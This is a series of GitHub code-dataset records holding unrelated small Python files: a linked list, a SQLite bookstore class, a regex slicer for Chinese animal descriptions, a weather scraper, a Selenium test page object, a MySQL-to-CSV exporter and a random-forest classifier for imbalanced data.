:: \" + str(total_read) + \" + \" + str(bytes_on_line) + \" > \" + str(length) + \" truncating to only read \" + str(length - total_read))\n\t\t\tbytes_on_line = length - total_read\n\n\t\tif bytes_on_line == 0 and total_read < length:\n\t\t\tprint(\"warning 2 @ \" + str(data.tell()) + \" :: was going to read 0 but we have \" + str(length - total_read) + \" left to read. 
Reading it...\")\n\t\t\tbytes_on_line = length - total_read\n\n\t\tprint(\"Finished reading line, moving to next, which is \" + str(bytes_on_line) + \", read = \" + str(total_read) + \", total = \" + str(length))\n\t\touter_loop += 1\n\n\t\tif total_read >= length:\n\t\t\tprint(\"ending \" + str(total_read) + \" >= \" + str(length))\n\t\t\trunning = False\n\n\twhile len(all_rows) < height:\n\t\tall_rows.append(width * [0])\n\n\tprint(\"Finished reading tile \" + str(len(all_rows)) + \", read \" + str(total_read) + \"/\" + str(length))\n\tall_rows.reverse()\n\treturn all_rows\n","repo_name":"jasoncabot/fallen","sub_path":"extractor/extractor/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12746,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"54"} +{"seq_id":"25328309714","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Nov 18 21:11:53 2018\r\n\r\n@author: ljc\r\n\"\"\"\r\n\r\nclass Node(object):\r\n def __init__(self,data,pnext=None,ppre = None):\r\n self._next = pnext\r\n self._prev = ppre\r\n self.data = data\r\n def __repr__(self):\r\n return str(self.data)\r\nclass linked_list(object):\r\n def __init__(self):\r\n self.head=None\r\n self.length = 0\r\n def __str__(self):\r\n str_init = ''\r\n if not self.isEmpty():\r\n node = self.head\r\n while node._next:\r\n str_init += str(node.data)\r\n str_init += '-->'\r\n node = node._next\r\n str_init += str(node.data)\r\n return str_init\r\n def isEmpty(self):\r\n return self.length ==0\r\n def append(self,dataOrnode):\r\n item = None\r\n if isinstance(dataOrnode,Node):\r\n item = dataOrnode\r\n else:\r\n item = Node(dataOrnode)\r\n \r\n if not self.head:\r\n self.head = item\r\n self.length+=1\r\n else:\r\n node = self.head\r\n while node._next:\r\n node = node._next\r\n node._next = item\r\n self.length +=1 \r\n \r\n def insert(self,dataOrnode,index=0):\r\n if self.isEmpty():\r\n print('Linked list is already empty now initialize')\r\n self.__init__()\r\n if index>self.length or index<0:\r\n print('index error')\r\n else:\r\n item = None\r\n if isinstance(dataOrnode,Node):\r\n item = dataOrnode\r\n else:\r\n item = Node(dataOrnode)\r\n if index == 0:\r\n head = self.head\r\n item._next = head\r\n self.head = item\r\n self.length += 1\r\n\r\n else:\r\n counter = index-1\r\n node = self.head\r\n self.length += 1\r\n \r\n while counter>0:\r\n node = node._next\r\n counter -=1\r\n node_next = node._next\r\n item._next = node_next\r\n node._next = item\r\n def delete(self,index):\r\n if self.isEmpty():\r\n print('Linked list is empty')\r\n elif index == 0:\r\n node = self.head._next\r\n self.head = node\r\n elif index>=self.length or index<0:\r\n print('index too big or small')\r\n else:\r\n node = self.head\r\n while index-1>0:\r\n node = node._next\r\n index -= 1\r\n node_next = node._next\r\n node._next = node_next._next\r\n \r\n# def trans_to_array(self):\r\n# new_array = [[]]*(3*self.length)\r\n# node = self.head\r\n# \r\n \r\n \r\n \r\nif __name__ == '__main__':\r\n first_list = linked_list()\r\n# first_list.insert(20,0)\r\n first_list.append(60)\r\n first_list.append(80)\r\n first_list.insert(70,first_list.length)\r\n print(first_list)\r\n print(first_list.length)\r\n first_list.delete(3)\r\n \r\n print(first_list)\r\n a = first_list.head\r\n# print(first_list,first_list.head.data)\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n 
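\r\n# A minimal traversal sketch, assuming only the linked_list API above\r\n# (head plus per-node _next). Note that Node also declares a _prev slot,\r\n# but append/insert never set it, so the chain is only walkable forwards.\r\ndef traverse(ll):\r\n    node = ll.head\r\n    while node is not None:\r\n        yield node.data\r\n        node = node._next\r\n\r\n# e.g. print(list(traverse(first_list)))  # -> [60, 80, 70]\r\n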
","repo_name":"JIACHENG135/leetcode2","sub_path":"算法导论/linked_list.py","file_name":"linked_list.py","file_ext":"py","file_size_in_byte":3361,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"16388993240","text":"import sqlite3\n\n\n### THIS IS NOT THE MOST OPTIMIZED AND CLEAN WAY TO WRITE THE CLASS - CHECK \"BookStore_Back_optimized\" FILE - TO SEE HOW TO MAKE IT EVEN CLEANER \n\n\nclass DB_operations():\n\n def __init__(self,title=None,year=None,author=None,isbn=None):\n\n self.title=title\n self.year=year\n self.author=author\n self.isbn=isbn\n\n\n def create_table(self):\n db=sqlite3.connect(\"Book_DB.db\")\n cur=db.cursor()\n cur.execute(\"CREATE TABLE IF NOT EXISTS books(title TEXT, year TEXT, author TEXT, isbn TEXT)\")\n db.commit()\n db.close()\n\n \n def insert_db(self):\n db=sqlite3.connect(\"Book_DB.db\")\n cur=db.cursor()\n cur.execute(\"INSERT INTO books VALUES(?,?,?,?)\",( self.title,self.year,self.author,self.isbn))\n db.commit()\n db.close()\n\n\n def search_db(self):\n db=sqlite3.connect(\"Book_DB.db\")\n cur=db.cursor()\n #DISTINCT DELETES DUPLICATE ROWS AND LEAVES ONLY ONE INSTANCE\n cur.execute(\"SELECT DISTINCT title,year,author,isbn FROM books WHERE title=? OR year=? OR author=? OR isbn=?\",( self.title,self.year,self.author,self.isbn))\n view=cur.fetchall()\n return view\n db.close()\n\n def view_all(self):\n db=sqlite3.connect(\"Book_DB.db\")\n cur=db.cursor()\n #DISTINCT DELETES DUPLICATE ROWS AND LEAVES ONLY ONE INSTANCE\n cur.execute('SELECT DISTINCT title,year,author,isbn FROM books')\n view=cur.fetchall()\n return view\n db.close()\n\n def update_table(self):\n db=sqlite3.connect(\"Book_DB.db\")\n cur=db.cursor()\n while True:\n try:\n cur.execute(\"UPDATE books SET title=?, year=?, author=?, isbn=? 
WHERE isbn=?\",( self.title,self.year,self.author,self.isbn,self.isbn))\n break\n except:\n print(\"Please enter a valid ISBN\")\n db.commit()\n db.close()\n\n def delete_table(self):\n db=sqlite3.connect(\"Book_DB.db\")\n cur=db.cursor()\n #DELETES THE ENTIRE ROW\n cur.execute(\"DELETE FROM books WHERE isbn=?\",(self.isbn,))\n db.commit()\n db.close()\n\n def delete_all(self):\n db=sqlite3.connect(\"Book_DB.db\")\n cur=db.cursor()\n #DELETES EVERYTHING\n cur.execute(\"DELETE FROM books\")\n db.commit()\n db.close()\n\n\n \n \n\n\n#db=DB_operations(\"Toshko\",2008,\"manga\",\"1232421561\")\n#db.insert_db()\n#db=DB_operations(\"Harry Potter\",2002,\"J.K.Rowling\",\"1232421540\")\n \n","repo_name":"BogoCvetkov/Small_Projects","sub_path":"Python projects/Simple Tkinter App/BookStore_Back.py","file_name":"BookStore_Back.py","file_ext":"py","file_size_in_byte":2529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"31690097843","text":"import re\n\nfrom common.slicer import slice_text, slice_organs\n\n\nclass AnimalCommon:\n org_slices = {}\n\n def get_org_name(self, text):\n ret, name_regex = '', ''\n for name_regex, info in self.org_slices.items():\n result = re.match(name_regex, text)\n if result:\n ret = result[0]\n break\n\n return ret, name_regex\n\n @staticmethod\n def pack_sample(text):\n ret = dict()\n\n for item in re.split(r';;', text):\n ret[f'标本:{item}'] = {}\n\n return ret\n\n def slice(self, text):\n ret = dict()\n\n sex = ''\n com = re.compile(r'([雌雄♀♂]性?)')\n info = com.match(text)\n if info:\n sex = info[0]\n if sex == '♂':\n sex = '雄'\n elif sex == '♀':\n sex = '雌'\n\n text = text.lstrip('雌雄性♀♂::')\n\n for paragraph in re.split(r'。', text):\n if text.startswith('标本记录'):\n ret.update(self.pack_sample(paragraph))\n continue\n\n name, regex = self.get_org_name(paragraph)\n if name:\n detail = paragraph.lstrip(name).lstrip(',,其的:')\n cont_dict = slice_organs(detail, self.org_slices[regex])\n if name not in ret:\n ret[name] = cont_dict\n else:\n ret[name].update(cont_dict)\n else:\n ret.update(slice_text(paragraph))\n\n return {sex: ret} if sex else ret\n\n\nclass MiXia(AnimalCommon):\n org_slices = {\n '额角': ['末端', '上缘', '基部', '下缘'],\n '头胸甲': ['长度', '前侧'],\n '尾节': ['背面', '末端', '末缘', '中央', '背侧', '末端'],\n # '侧刺': [],\n '间刺': ['中央间刺', '外侧间刺'],\n '柄刺': [],\n '肛前脊': [],\n r'(第\\d触角)': ['柄刺', '第1节', '第2节', '第3节', '鳞片', '内肢'],\n r'(第\\d颚足)': ['末节', '顶端', '末节', '约等于', '内肢', '末端', '末2节'],\n r'(第\\d步足)': ['长节', '腕节', '螯', '螫', '掌节', '掌', '指节', '座节', '前缘', '腹缘', '末端', '长'],\n r'(第\\d腹肢)': ['内肢', '内缘', '长', '基部', '末端', '末部', '内肢', '内附肢'],\n # '尾肢': [],\n '卵': ['卵径']\n }\n\n\nclass ZhiHuanChong(AnimalCommon):\n org_slices = {\n '成虫': ['虫体', '体长', '体宽', '长', '宽', '全长'],\n '咽': ['大小'],\n '后吸器': ['边缘', '柄', '钩尖', '小钩', '长'],\n '中央大钩': ['交接管', '基部', '交接器', '边缘', '钩尖', '全长', '外突', '内突'],\n '边缘': ['小钩', '长', '全长'],\n '联结片': ['中部', '两端', '副联结片', '大小'],\n '副联结片': ['大小'],\n '支持器': ['外缘', '凹面', '中部', '薄片', '柄端', '基部', '前端', '棒片', '交接管', '全长', '基端', '端部', '长', '叉', '一叉'],\n '交接管': ['基径', '管径', '管长', '端部', '基部', '支持器', '外缘', '凹面', '中部', '薄片', '长', '基端'],\n '阴道': ['管', '末端', '管长', '直径', '泡状部分', '泡状', '长', '盘圈'],\n \"卵子\": ['卵', '长', '宽', '具']\n }\n\n\nclass Luo:\n @staticmethod\n def slice(text):\n ret = dict()\n\n if text.startswith('壳高'):\n com = re.compile(r'([\\u4e00-\\u9fa5]*)(\\d*[.。.]*\\d*[a-zA-Z]*)')\n for item in com.findall(text):\n if item[0] and item[1]:\n ret[f'{item[0]}:{item[1]}'] = {}\n\n return {'标本测量:': ret} if ret else 
ret\n\n\nclass Feng(AnimalCommon):\n org_slices = {\n '头': ['触角', '柄节', '上颊', '后头', '头顶', '脸', '蠢基', '唇基', '口窝', '颊', '颚眼', '近后头脊', '近复眼', '顶',\n '微毛区', '端', '颅顶', '颊', '颜面', 'POL', '下脸', '中胸盾片', '复眼', '上颚', '上唇'],\n '翅': ['缘室', 'r脉', 'SR1+3-SR脉', 'SR1+3-SR脉', '2-SR脉', 'cu-a脉', 'M+CU脉', '前翅SR1脉', '2-M脉', 'CH-a脉', '前翅', '翅痣',\n '1-R1脉'],\n '胸': ['长', '前胸背板', '基节', '后胸', '中胸', '盾', '小盾片', '后胸背板', '基', '并胸腹节'],\n '足': ['跗爪', '后足腿节', '后足胫节', '后足跗节', '爪', '基跗节', '基节', '前后足腿节', '转节', '前后足腿节', '中足', '前后足'],\n '腹': ['第1背板', '第2背板', '基区', '第3背板', '第4背板', '其余背板', '第2—3背板', '产卵管', '背脊',\n '背', '气门', '背板', '下生殖板', '鞘', '产卵管', '柄', '前部', '两侧', '第1-2背板及第3背板基半', '产卵管鞘'],\n '变异': ['触角', '产卵管', '腹部', '其他'],\n '触角': ['梗节', '索节', '棒节', '柄节', '第1鞭节', '第2鞭节', '第3鞭节', '上端', '第一索节', '第二索节',\n '腹部第2-6节', '第1—3节', '第4—6节', '第7节', '第6腹板', '生殖刺突']\n }\n\n def my_slice(self, text):\n ret = dict()\n\n for para in re.split('。', text):\n com = re.compile(r'(.*?)([深浅黄褐黑锈].*?色)[,;。]')\n\n color_info = dict()\n for item in com.findall(para):\n color_info[f'{item[0]}:{item[1]}'] = {}\n\n if color_info:\n ret.update(color_info)\n else:\n ret.update(self.slice(para))\n\n return ret\n\n\nclass Sou(AnimalCommon):\n org_slices = {\n '头部': ['头缝', '两侧', '后角', '后缘', '复眼', '触角', '基节', '第1节', '第2节', '第3节', '第4节', '第5节', '其余各节'],\n '前胸背板': ['前缘', '两侧', '后缘', '背面', '中沟', '后翅'],\n '前翅': ['肩角', '外缘', '内后角', '内、外后角', '表面'],\n '腹部': ['雄虫两侧', '后缘', '后部', '末腹'],\n '末腹': ['背板', '两侧', '后角', '后缘', '后部'],\n '尾铗': ['前部', '后部', '两支', '顶端', '内缘', '雌虫尾铗', '基部'],\n '亚末腹': ['板', '后缘', '表面'],\n '足': ['后足跗节', '腿节', '腹面'],\n '臀板': ['基部', '两侧', '后外侧', '后缘', '两后角'],\n '阳茎': ['阳茎叶端', '阳茎端刺', '基囊'],\n '鞘翅': ['前翅', '后缘', '后内角', '后翅', '外缘'],\n '触角': ['基节', '第2节', '第3节', '第4节', '其余各节'],\n '雌虫': ['末腹背板甚', '基部', '两尾铗', '后部', '顶端']\n }\n\n def my_slice(self, text):\n ret = dict()\n\n for item in re.split(r'。', text):\n if item.startswith('体长'):\n for p in re.split(r'[;;]', item):\n ret[p] = {}\n else:\n ret.update(self.slice(item))\n\n return ret\n\n\nclass Ya(AnimalCommon):\n org_slices = {\n '玻片标本': ['头部、胸部', '头部', '胸部', '腹部', '喙、足', '喙', '足', '跗节', '腹管、尾片',\n '腹管', '尾片', '触角', '其他', '中、后胸', '腹'],\n '触角': ['触角毛', '一般各节', '各节', '长毛', '原生感觉圈', '次生感觉圈', '基部'],\n '腹部': ['背片'],\n '体表': ['头', '腹部', '背片']\n }\n\n def my_slice(self, text):\n ret = dict()\n com = re.compile(r'([有无]翅孤雌蚜):?(.*)')\n\n for item in com.findall(text):\n ret.update({item[0].rstrip(':'): self.slice(item[1])})\n\n return ret\n\n\nclass Jie(AnimalCommon):\n org_slices = {\n '触角': [],\n '刺孔群': []\n }\n\n\nclass Chun(AnimalCommon):\n org_slices = {\n '体': ['体色', '毛', '臭腺'],\n '前胸背板': ['胝', '亚后缘', '后缘', '刻点', '毛'],\n '头': ['头宽', '长', '头顶'],\n '触角': ['第Ⅰ节', '雄虫', '雌'],\n '前翅': [],\n '膜片': [],\n '革片': [],\n '足': ['股节', '胫节', '后足', '基节', '前、中足', '各足胫节'],\n r'[左右]阳基': ['侧突', '端突', '端部', '基部', '近端部'],\n '阳茎': ['鞘', '端针'],\n '唇基': []\n }\n\n def my_slice(self, text):\n\n ret = dict()\n data = re.match(r'(量度\\(?m{0,2}\\)?)', text)\n if data:\n org_list = ['体长', '体宽', '头长', '头顶', '触角各节长', '后缘宽', '革片长', '楔片长', '前胸背板', '头宽']\n ret[data[0]] = slice_organs(text.replace(data[0], '').lstrip(':'), org_list)\n else:\n ret.update(self.slice(text))\n\n return ret\n\n\ndef slice_text_by_animal_org(keyword, text):\n ret = dict()\n\n if '米虾' in keyword:\n ret.update(MiXia().slice(text))\n\n elif '指环虫' in keyword or '三代虫' in keyword:\n ret.update(ZhiHuanChong().slice(text))\n\n elif keyword.endswith('螺'):\n ret.update(Luo().slice(text))\n\n elif keyword.endswith('蜂'):\n ret.update(Feng().slice(text))\n\n elif 
keyword.endswith('螋'):\n ret.update(Sou().my_slice(text))\n\n elif '蚜' in keyword:\n ret.update(Ya().my_slice(text))\n\n elif '蚧' in keyword:\n ret.update(Jie().slice(text))\n\n elif '蝽' in keyword:\n ret.update(Chun().my_slice(text))\n\n return ret\n","repo_name":"HinsChueng/baike_spider","sub_path":"animals.py","file_name":"animals.py","file_ext":"py","file_size_in_byte":9519,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"17917865437","text":"from bs4 import BeautifulSoup\nfrom urllib.request import urlopen\nimport re\nimport csv\nimport sys\n\nf = open(sys.argv[1], 'wt')\n\nurl=\"http://panahon.observatory.ph/index.html\"\npage=urlopen(url)\nsoup = BeautifulSoup(page.read())\n\nareas=soup.findAll('div',{'id':re.compile(\"\\w*-rain$\")})\n\ntry:\n\twriter = csv.writer(f)\n\twriter.writerow( ('Station', 'Timestamp', 'Rainfall') )\n\tfor eacharea in areas:\n\t\tdetails = eacharea.findAll('span',{'class':'highlight'})\n\t\twriter.writerow(((eacharea.get('id')),(details[0].text),(details[1].text)))\nfinally:\n\tf.close()\n\nprint (open(sys.argv[1], 'rt').read())","repo_name":"hailmika/mo-scraper","sub_path":"weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71696622241","text":"import os\r\nimport sys\r\nimport argparse\r\n\r\n\r\ndef main():\r\n args = parse_arguments()\r\n try:\r\n return logToDns(args.domain_name, args.ip_address)\r\n except:\r\n return \"ERR\"\r\n\r\n\r\ndef parse_arguments():\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument(\"--domain_name\", default=None, help=\"Credentials, plz\", required=True)\r\n parser.add_argument(\"--ip_address\", default=None, help=\"Credentials, plz\", required=True)\r\n args = parser.parse_args()\r\n return args\r\n\r\n\r\ndef logToDns(new_name, raw_addy):\r\n usr = \"super_secure_dns_user\"\r\n pwd = os.getenv('dns_pswd')\r\n # You need to write this yourself as it's specific to your environment.\r\n\r\nif __name__ == '__main__':\r\n try:\r\n main()\r\n except KeyboardInterrupt:\r\n print('Interrupted \\_[*.*]_/\\n')\r\n try:\r\n sys.exit(0)\r\n except SystemExit:\r\n os._exit(0)\r\n","repo_name":"gjbsaiia/easyJoinAPI","sub_path":"backend/updateDNS.py","file_name":"updateDNS.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"24519085023","text":"from selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support import expected_conditions as ec\nfrom selenium.webdriver.support.ui import WebDriverWait as wait\n\nfrom .InterfaceConfig import InterfaceConfig\nfrom Modules.element_attributes import element_visible_and_enabled\n\n\nclass IpMappings(InterfaceConfig):\n\n def __init__(self, driver):\n super().__init__(driver)\n\n def open(self):\n settings = self.driver.find_element(By.CSS_SELECTOR, 'a[href=\"/settings/\"]')\n settings.click()\n ip_mappings = self.driver.find_element(By.CSS_SELECTOR, 'a[href=\"/settings/ip_mappings/\"]')\n ip_mappings.click()\n\n def add_entries(self, list_of_entries_tuples):\n \"\"\"Will add entries entered as a list of tuples(node_name, ims_entity,ip_addr)\"\"\"\n self.wait_for_add_entry_table_to_load()\n rows_count = len(list_of_entries_tuples)\n # Loop through Add Entries table and click the + to add rows\n for row in range(rows_count - 
1):\n self.driver.find_element(\n By.CSS_SELECTOR,\n '#table-new-mapping tbody > tr > td .fa.fa-plus').click()\n # extract all rows in the mappings table 'tr' elements\n rows = self.driver.find_elements(\n By.CSS_SELECTOR, '#table-new-mapping tbody tr')\n # Loop through the new rows in Add Entries table and add data\n for index in range(rows_count):\n node_name, ims_entity, ip_addr = rows[index].find_elements(By.CSS_SELECTOR, 'input')\n # send data to field\n node_name.send_keys(list_of_entries_tuples[index][0])\n ims_entity.send_keys(list_of_entries_tuples[index][1])\n ip_addr.send_keys(list_of_entries_tuples[index][2])\n add_node = self.driver.find_element(\n By.CSS_SELECTOR, '#new-mapping-form .btn.btn-primary')\n add_node.click()\n\n def delete_entries(self, list_of_entries_tuples):\n for entry in list_of_entries_tuples:\n search = self.driver.find_element(By.CSS_SELECTOR, '.float-right.search > input')\n # search using ip address as it's unique\n search.send_keys(entry[2].lower(), Keys.ENTER)\n self._wait_mapping_table_load()\n # Using sleep as the search is too slow and makes the wait refer to wrong element\n row_remove = self.driver.find_element(\n By.CSS_SELECTOR, '#table-ip-mappings > tbody > tr td .fa.fa-remove')\n row_remove.click()\n search.clear()\n\n def bulk_delete_verify_deleted(self, list_of_entries_tuples):\n self.add_entries(list_of_entries_tuples)\n self.jump_to_last_page()\n self._wait_mapping_table_load()\n table_rows = self.driver.find_elements(\n By.CSS_SELECTOR, '#table-ip-mappings > tbody tr')\n for row in table_rows:\n cell = row.find_elements(By.CSS_SELECTOR, 'td')\n cell_checkbox = row.find_element(By.CSS_SELECTOR, 'input')\n for entry in list_of_entries_tuples:\n if cell[3].text == entry[2]:\n cell_checkbox.click()\n break\n delete_button = self.driver.find_element(By.CSS_SELECTOR, '#btn-delete-mappings')\n delete_button.send_keys(Keys.ENTER)\n self._wait_mapping_table_load()\n self.verify_deleted(list_of_entries_tuples)\n\n def jump_to_last_page(self):\n if element_visible_and_enabled(self.driver, '.page-last > a'):\n show_table_last_page = self.driver.find_element(By.CSS_SELECTOR, '.page-last > a')\n show_table_last_page.click()\n\n def get_help_verify(self):\n get_help = self.driver.find_element(\n By.CSS_SELECTOR,\n 'a[href=\"/help_text/ip_mappings/\"] .fa-question-circle')\n main_window_handle = self.driver.window_handles[0]\n get_help.click()\n all_windows_handles = self.driver.window_handles\n for handle in all_windows_handles:\n if handle != main_window_handle:\n self.driver.switch_to.window(handle)\n wait(self.driver, 10).until(ec.text_to_be_present_in_element(\n (By.TAG_NAME, 'h1'), 'IP Mappings'))\n header_csv_style = self.driver.find_element(By.TAG_NAME, 'h4')\n help_text = self.driver.find_element(By.TAG_NAME, 'p')\n mandatory = self.driver.find_element(By.TAG_NAME, 'ul')\n # assert header_ip_mapping.text == 'Interface Config'\n assert header_csv_style.text == 'CSV style for uploading IP mappings'\n assert help_text.text == ('The CSV must have the columns:\\nNode name, IMS entity, IP address'\n '\\nThe columns must be in this order! 
You can specify if you have a headline'\n ' or not.\\nYou can choose between following delimiters: \",\" \";\"\\n'\n '\\nThe mapping list must include at least the following node types:')\n\n assert mandatory.text == 'P-CSCF\\nS-CSCF'\n self.driver.close()\n self.driver.switch_to.window(main_window_handle)\n","repo_name":"l33t3mr/python-automation","sub_path":"SETA-Frontend/Classes/POM/IpMappings.py","file_name":"IpMappings.py","file_ext":"py","file_size_in_byte":5231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"30467899099","text":"import time\r\n\r\nstart = time.time()\r\nprint(start)\r\nimport mysql.connector\r\n\r\n\r\ndef fetch_table_data(table_name):\r\n # The connect() constructor creates a connection to the MySQL server and returns a MySQLConnection object.\r\n cnx = mysql.connector.connect(user='root', password='root', host='localhost', database='mydatabase1')\r\n\r\n cursor = cnx.cursor()\r\n query = \"select REGISTRATION NO,STUDENT EMAIL ID from \" + table_name\r\n print(query)\r\n query1 = \" where OrderID='170386207'\"\r\n query2 = query + query1\r\n print(query2)\r\n cursor.execute(\"select ORDERId from \" + table_name + \" where OrderID>'1000'\")\r\n\r\n header = [row[0] for row in cursor.description]\r\n\r\n rows = cursor.fetchall()\r\n\r\n # Closing connection\r\n cnx.close()\r\n\r\n return header, rows\r\n\r\n\r\ndef export(table_name):\r\n header, rows = fetch_table_data(table_name)\r\n column_name = \"ItemType\"\r\n # Create csv file\r\n f = open(column_name + '.csv', 'w')\r\n\r\n # Write header\r\n f.write(','.join(header) + '\\n')\r\n\r\n for row in rows:\r\n f.write(','.join(str(r) for r in row) + '\\n')\r\n\r\n f.close()\r\n print(str(len(rows)) + ' rows written successfully to ' + f.name)\r\n\r\n\r\n# Tables to be exported\r\n# export('customers4')\r\nexport('student')\r\nend = time.time()\r\ntime_taken = end - start\r\nprint(time_taken)\r\n","repo_name":"gargvivek24/python_dummy_project","sub_path":"databasetocsv.py","file_name":"databasetocsv.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"1397615044","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Feb 16 14:03:53 2020\r\n\r\n@author: Rahmesses\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport sklearn\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn import preprocessing\r\nfrom sklearn.utils import resample\r\nfrom sklearn.metrics import roc_curve, auc\r\nfrom sklearn.externals import joblib\r\nimport matplotlib.pyplot as plt\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense\r\nfrom keras.layers import Dropout\r\n\r\n\r\nclass PredictOutcome(): \r\n \r\n def Read_Data(): # Read data from input path\r\n \r\n train = pd.read_csv(path + \"/\" + \"train.csv\")\r\n test = pd.read_csv(path+ \"/\" + \"test.csv\")\r\n \r\n return train,test\r\n \r\n def Preprocess(df): # Data preprocessing\r\n \r\n df.gender =df.gender.fillna(df.gender.mode()[0]) # Fill NA with mode of gender\r\n \r\n # Normalize continuous numeric features and create dummies for categrical features\r\n \r\n normalize = preprocessing.MinMaxScaler() \r\n df=pd.get_dummies(df,columns=['device_type','gender','in_initial_launch_location','n_drivers','n_vehicles'])\r\n df.age = normalize.fit_transform(df[['age']].astype(np.float))\r\n df.income = 
normalize.fit_transform(df[['income']].astype(np.float))\r\n df.cost_of_ad = normalize.fit_transform(df[['cost_of_ad']].astype(np.float))\r\n df.prior_ins_tenure = normalize.fit_transform(df[['prior_ins_tenure']].astype(np.float))\r\n \r\n return df\r\n \r\n def TrainModel(): #Model Training\r\n \r\n train = PredictOutcome.Read_Data()[0]\r\n train= PredictOutcome.Preprocess(train)\r\n \r\n # Data is imbalanced. Undersampling the class in majority and Oversampling class in minority to match the observation count\r\n \r\n outcome_0 = train[train.outcome==0]\r\n outcome_1 = train[train.outcome==1]\r\n train_downsampled_0 = resample(outcome_0,replace=True,n_samples=len(outcome_0)//5,random_state=27)\r\n train_upsampled_1 = resample(outcome_1,replace=True,n_samples=len(outcome_0)//5,random_state=27)\r\n \r\n train = pd.concat([train_downsampled_0,train_upsampled_1])\r\n \r\n # Creating numpy arrays for model input\r\n \r\n X = train.loc[:,train.columns!='outcome'].values\r\n Y = train.loc[:,train.columns=='outcome'].values\r\n \r\n # Split the training data into train and validate\r\n\r\n X_train, X_validate, Y_train, Y_validate = train_test_split(X,Y,test_size=0.2, random_state=25)\r\n \r\n # Random Forest Model and predictions\r\n# \r\n RF_Model = RandomForestClassifier(n_estimators = 200, random_state = 42)\r\n RF_Model.fit(X_train,Y_train.ravel())\r\n pred_RF = RF_Model.predict(X_validate)\r\n \r\n# model = Sequential()\r\n# model.add(Dense(1000, input_dim = 18, activation= 'sigmoid'))\r\n# #model.add(Dropout(0.2))\r\n# model.add(Dense(1000, activation= 'relu'))\r\n# model.add(Dropout(0.2))\r\n# model.add(Dense(1000, activation= 'relu'))\r\n# model.add(Dropout(0.2))\r\n# #model.add(Dense(100, activation= 'relu'))\r\n# # model.add(Dropout(0.2))\r\n# #model.add(Dense(100, activation= 'relu'))\r\n# #model.add(Dropout(0.2))\r\n# model.add(Dense(1, activation= 'sigmoid'))\r\n# \r\n# model.compile(loss='binary_crossentropy', optimizer='rmsprop', metrics=['accuracy'])\r\n# \r\n# ## Training\r\n# \r\n# model.fit(X_train, Y_train, epochs=25, batch_size=100)\r\n# \r\n# ## Accuracy\r\n# \r\n# _, accuracy = model.evaluate(X_train, Y_train)\r\n# print('Accuracy: %.2f' % (accuracy*100))\r\n# \r\n# ## Predictions\r\n# \r\n# predictions = model.predict_classes(X_validate)\r\n# \r\n \r\n ## 10 predictions\r\n \r\n #for i in range(10):\r\n \t#print('%s => %d (expected %d)' % (X_test[i].tolist(), predictions[i], Y_test[i]))\r\n \r\n \r\n # Model Evaluation Metrics. 
Plot ROC and Calculate AUC\r\n        \r\n        fpr_RF = dict()\r\n        tpr_RF = dict()\r\n        roc_auc_RF = dict()\r\n        \r\n        fpr_RF, tpr_RF, _ = roc_curve(Y_validate, pred_RF)\r\n        roc_auc_RF = auc(fpr_RF,tpr_RF)\r\n        \r\n        plt.figure()\r\n        lw = 2\r\n        plt.plot(fpr_RF, tpr_RF, color='darkorange', label='ROC curve (area = %0.2f)' % roc_auc_RF)\r\n        plt.plot([0, 1], [0, 1], color='navy', lw=lw, linestyle='--')\r\n        plt.xlim([0.0, 1.0])\r\n        plt.ylim([0.0, 1.05])\r\n        plt.xlabel('False Positive Rate')\r\n        plt.ylabel('True Positive Rate')\r\n        plt.title('ROC - Random Forest')\r\n        plt.legend(loc=\"lower right\")\r\n        plt.show()\r\n        \r\n        print(\"AUC of the model:\",auc(fpr_RF,tpr_RF))\r\n        \r\n        # Store the model for later use in the designated path; Predict() below\r\n        # loads this same \"RF_Model\" file, so it must be written here\r\n        joblib.dump(RF_Model, path + \"/\" + \"RF_Model\")\r\n        \r\n    def Predict():\r\n        \r\n        # Preprocessing test data for model input\r\n        \r\n        test_original = PredictOutcome.Read_Data()[1]\r\n        test = PredictOutcome.Preprocess(test_original)\r\n        \r\n        # Load stored model\r\n        \r\n        RF_Model = joblib.load(path + \"/\" + \"RF_Model\")\r\n        \r\n        predict = RF_Model.predict(test) # Predictions\r\n        \r\n        test_original['outcome'] = predict # Add predicted values in test_original\r\n        \r\n        return test_original.to_csv(path + \"/\" + \"PredictedTest.csv\",index=False) # Store data in CSV file\r\n        \r\n    def main():\r\n        #global path\r\n        #path = input(\"Please enter the path\")\r\n        PredictOutcome.TrainModel()\r\n        PredictOutcome.Predict()\r\n    \r\nif __name__ == \"__main__\":\r\n    \r\n    path = input(\"Please enter the path of stored files\")\r\n    PredictOutcome.main()","repo_name":"rahmesses/Random-Forrest-for-Class-Imbalance-Problem","sub_path":"RandomForrest_Unbalanced_Class_Problem.py","file_name":"RandomForrest_Unbalanced_Class_Problem.py","file_ext":"py","file_size_in_byte":5903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"17970705170","text":"import json, random\nimport urllib\nfrom urllib import request\n\n\n# title\n# genre\n# id - way to store specific movie for favorites 